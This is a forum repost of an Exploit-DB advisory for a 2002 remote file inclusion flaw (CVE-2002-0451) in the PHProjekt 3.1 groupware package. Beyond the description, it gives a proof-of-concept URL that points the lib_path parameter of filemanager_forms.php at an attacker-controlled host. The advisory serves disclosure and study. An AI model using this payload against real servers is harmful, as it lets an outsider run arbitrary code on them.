Exploit PHProjekt 3.1 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21343
Проверка EDB
  1. Пройдено
Автор
B0ILER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2002-0451
Дата публикации
2002-03-13
Код:
source: https://www.securityfocus.com/bid/4284/info

PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems.

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited. 

http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts
 
Источник
www.exploit-db.com

Похожие темы